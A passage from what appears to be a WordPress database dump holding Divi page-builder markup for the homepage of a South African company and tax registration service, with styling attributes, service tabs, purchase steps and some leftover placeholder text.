animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#fafbfd\" background_color_gradient_end=\"#ffffff\" background_color_gradient_direction=\"90deg\" background_color_gradient_start_position=\"80%\" background_color_gradient_end_position=\"80%\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/Bank_13.png\" _builder_version=\"3.17.6\" animation_style=\"roll\" animation_direction=\"left\" animation_intensity_roll=\"2%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" padding_right=\"60px\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Roboto|700|||||||\" header_3_font_size=\"35px\" header_3_font_size_phone=\"25px\" header_3_font_size_last_edited=\"on|desktop\" header_3_line_height=\"1.4em\"]<h3>Limited Time Offer! Praesent Sapien Massa Convallis a Pellentesque Nec.</h3>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.</p>\r[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"3.17.2\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#272d37\" button_border_width=\"15px\" button_border_color=\"#272d37\" button_border_radius=\"0px\" button_font=\"Roboto|700|||||||\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" padding_left_right_link_2=\"true\" padding_right_2=\"5vw\" padding_left_2=\"5vw\" admin_label=\"Offer\" _builder_version=\"3.17.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(46,220,177,0.84)\" background_color_gradient_end=\"#2edcb1\" background_color_gradient_overlays_image=\"on\" background_image=\"https://companyregistration.online/wp-content/uploads/2018/12/bed-and-breakfast-20.jpg\" border_width_all=\"5vw\" border_color_all=\"#ffffff\" border_width_bottom=\"0px\" module_alignment=\"center\" custom_margin=\"||100px\" custom_padding=\"0|5vw|0|5vw|false|true\" animation_style=\"fade\" locked=\"off\"][et_pb_row make_fullwidth=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"0|0px|0|0px|false|false\" padding_left_right_link_2=\"true\" padding_top_2=\"60px\" padding_right_2=\"5vw\" padding_left_2=\"5vw\" _builder_version=\"3.17.2\"][et_pb_column type=\"2_5\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" header_font=\"||||||||\" header_2_font=\"Roboto|900|||||||\" header_2_font_size=\"3vw\" header_2_font_size_tablet=\"35px\" header_2_font_size_phone=\"25px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height=\"1.4em\" header_3_font=\"||||||||\" header_4_font=\"Roboto||||||||\" header_4_text_color=\"#666666\" header_4_font_size=\"24px\" header_4_line_height=\"1.4em\" background_color=\"#ffffff\" custom_margin=\"|||||false\" custom_padding=\"100px|5vw|100px|5vw|false|true\" custom_padding_tablet=\"30px|30px|30px|30px|true|true\" custom_padding_last_edited=\"on|tablet\" locked=\"off\" header_font_size__hover=\"30px\" header_font_size__hover_enabled=\"30px\" header_letter_spacing__hover=\"0px\" header_letter_spacing__hover_enabled=\"0px\" header_text_shadow_style__hover=\"none\" header_text_shadow_style__hover_enabled=\"none\" header_text_shadow_color__hover=\"rgba(0,0,0,0.4)\" header_text_shadow_color__hover_enabled=\"rgba(0,0,0,0.4)\"]<h4>Special Offer</h4>\n<h2>Thinking of Becoming a Business Owner?</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"3.0.47\" padding_left=\"5vw\" padding_right=\"5vw\" padding_top=\"60px\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" header_font=\"||||||||\" header_2_font=\"Roboto|900|||||||\" header_2_font_size=\"4vw\" header_2_font_size_tablet=\"35px\" header_2_font_size_phone=\"25px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height=\"1.4em\" header_4_font=\"Roboto||||||||\" header_4_text_color=\"#666666\" header_4_font_size=\"24px\" header_4_line_height=\"1.2em\" background_layout=\"dark\" locked=\"off\" header_font_size__hover=\"30px\" header_font_size__hover_enabled=\"30px\" header_letter_spacing__hover=\"0px\" header_letter_spacing__hover_enabled=\"0px\" header_text_shadow_style__hover=\"none\" header_text_shadow_style__hover_enabled=\"none\" header_text_shadow_color__hover=\"rgba(0,0,0,0.4)\" header_text_shadow_color__hover_enabled=\"rgba(0,0,0,0.4)\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\"]<h2>Preparation is Key. We\'re Here to Help.</h2>\r[/et_pb_text][et_pb_divider color=\"#29c4a9\" divider_weight=\"3px\" height=\"3px\" _builder_version=\"3.17.2\" max_width=\"100px\" custom_margin=\"||20px\"][/et_pb_divider][et_pb_text _builder_version=\"3.17.2\" text_font=\"||||||||\" header_font=\"||||||||\" header_4_font=\"Roboto||||||||\" header_4_text_color=\"#ffffff\" header_4_font_size=\"24px\" header_4_line_height=\"1.2em\"]<h4>Check out Today\'s Low Rates </h4>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row make_fullwidth=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"0|0px|0|0px|false|false\" _builder_version=\"3.17.2\"][et_pb_column type=\"2_5\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_button button_text=\"Get Prequalified\" _builder_version=\"3.17.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#272d37\" button_border_width=\"15px\" button_border_color=\"#272d37\" button_border_radius=\"0px\" button_font=\"Roboto|700|||||||\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Blog\" _builder_version=\"3.17.2\"][et_pb_row _builder_version=\"3.17.2\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.2\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Roboto|700|||||||\" header_3_font_size=\"35px\" header_3_font_size_phone=\"25px\" header_3_font_size_last_edited=\"on|desktop\" header_3_line_height=\"1.4em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\"]<h3>News &amp; Stories</h3>\r[/et_pb_text][et_pb_social_media_follow _builder_version=\"3.17.6\" border_radii=\"on|0px|0px|0px|0px\" text_orientation=\"center\"][et_pb_social_media_follow_network social_network=\"facebook\" _builder_version=\"3.17.6\" background_color=\"#2edcb1\" custom_margin=\"|6px||6px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\" background_color__hover=\"#3b5998\" background_color__hover_enabled=\"#3b5998\" follow_button=\"off\" url_new_window=\"on\"]facebook[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"twitter\" _builder_version=\"3.17.6\" background_color=\"#2edcb1\" custom_margin=\"|6px||6px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" background_color__hover=\"#3b5998\" background_color__hover_enabled=\"#3b5998\" follow_button=\"off\" url_new_window=\"on\"]twitter[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"google-plus\" url=\"#%20\" _builder_version=\"3.17.6\" background_color=\"#2edcb1\" custom_margin=\"|6px||6px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" background_color__hover=\"#3b5998\" background_color__hover_enabled=\"#3b5998\" follow_button=\"off\" url_new_window=\"on\"]google-plus[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"linkedin\" _builder_version=\"3.17.6\" background_color=\"#2edcb1\" custom_margin=\"|6px||6px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" background_color__hover=\"#3b5998\" background_color__hover_enabled=\"#3b5998\" follow_button=\"off\" url_new_window=\"on\"]linkedin[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"instagram\" _builder_version=\"3.17.6\" background_color=\"#2edcb1\" custom_margin=\"|6px||6px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\" background_color__hover=\"#3b5998\" background_color__hover_enabled=\"#3b5998\" follow_button=\"off\" url_new_window=\"on\"]instagram[/et_pb_social_media_follow_network][/et_pb_social_media_follow][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.17.2\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blog fullwidth=\"off\" posts_number=\"3\" show_pagination=\"off\" _builder_version=\"3.17.6\" header_level=\"h6\" header_font=\"Roboto|700|||||||\" header_font_size=\"16px\" header_line_height=\"1.4em\" body_line_height=\"2em\" meta_font=\"Roboto|700|||||||\" meta_text_color=\"#30cd9a\" meta_line_height=\"2em\" border_width_all=\"0px\" border_color_all=\"rgba(0,0,0,0)\" box_shadow_style=\"preset2\" box_shadow_blur=\"45px\" box_shadow_color=\"#ffffff\" box_shadow_vertical__hover=\"30px\" box_shadow_vertical__hover_enabled=\"on\" box_shadow_color__hover_enabled=\"on\" box_shadow_color__hover=\"rgba(131,146,167,0.2)\"][/et_pb_blog][et_pb_button button_text=\"Read More\" button_alignment=\"center\" _builder_version=\"3.17.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#272d37\" button_border_width=\"15px\" button_border_color=\"#272d37\" button_border_radius=\"0px\" button_font=\"Roboto|700|||||||\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Home Revemp 2','','publish','closed','closed','','home-revemp-2','','','2018-12-11 11:08:54','2018-12-11 09:08:54','',0,'https://companyregistration.online/?page_id=29385',0,'page','',0),(29421,3,'2018-12-11 11:26:56','2018-12-11 09:26:56','[et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.0.85\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.17.6\" custom_padding=\"26px|0px|131px|1px|false|false\"][et_pb_row make_fullwidth=\"on\" custom_padding=\"0px|0px|0px|0px\" _builder_version=\"3.0.58\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_text_color=\"#000000\" text_font_size=\"26px\"]<p style=\"text-align: center;\">We Do South African Company And Tax Registrations Of All Businesses Types</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row make_fullwidth=\"on\" custom_padding=\"10px|0px|0px|0px\" custom_margin=\"|||\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" admin_label=\"Flags\" _builder_version=\"3.2.1\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2017/07/Sa-Flag-optimised.png\" _builder_version=\"3.0.89\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2017/07/Sa-Flag-optimised.png\" align=\"right\" disabled_on=\"on|on|off\" _builder_version=\"3.2.1\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row make_fullwidth=\"on\" custom_padding=\"0px|0px|0px|0px\" _builder_version=\"3.0.58\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.3.1\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" tab_font=\"Abel||||\" tab_font_size=\"17px\" body_font=\"||||\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.2.2\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.3.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.17.6\"][et_pb_row custom_padding=\"40px|8px|27px|8px|false|false\" _builder_version=\"3.17.6\" border_radii=\"on|15px|15px|15px|15px\" box_shadow_style=\"preset1\"][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_text_color=\"#000000\" text_font_size=\"31px\" header_font=\"||||||||\" header_font_size=\"28px\"]<p style=\"text-align: center;\">Step 1</p>[/et_pb_text][et_pb_blurb title=\"Find The Product You Need\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-23.png\" _builder_version=\"3.17.6\" header_font=\"||||||||\" header_text_align=\"center\" header_font_size=\"25px\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600.png\" _builder_version=\"3.17.6\" max_width=\"80%\" custom_padding=\"63px||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_text_color=\"#000000\" text_font_size=\"25px\"]<p style=\"text-align: center;\">Step 2</p>[/et_pb_text][et_pb_blurb title=\"Purchase The Product\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/Bank_13.png\" _builder_version=\"3.17.6\" header_font=\"||||||||\" header_text_align=\"center\" header_font_size=\"25px\" body_font=\"||||||||\" body_font_size=\"19px\" text_orientation=\"center\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600.png\" _builder_version=\"3.17.6\" max_width=\"80%\" custom_padding=\"63px||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_text_color=\"#000000\" text_font_size=\"25px\"]<p style=\"text-align: center;\">Step 3</p>[/et_pb_text][et_pb_blurb title=\"Complete Details On Form\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-18.png\" _builder_version=\"3.17.6\" header_font=\"||||||||\" header_text_align=\"center\" header_font_size=\"25px\" body_font=\"||||||||\" body_font_size=\"22px\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row custom_padding=\"62px|0px|0|0px|false|false\" _builder_version=\"3.17.6\"][et_pb_column type=\"4_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row custom_padding=\"27px|0px|70px|0px|false|false\" _builder_version=\"3.17.6\"][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\"]<p>Your content goes here. Edit or remove this text inline or in the module Content settings. <br /><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600.png\"><img src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600.png\" width=\"93\" height=\"93\" alt=\"\" class=\"wp-image-28359 alignnone size-full\" style=\"float: right;\" /></a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Owner Managed\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.17.6\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|700|||||||\" background_layout=\"dark\" custom_margin=\"-25px||\" custom_padding=\"0px||0px\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" 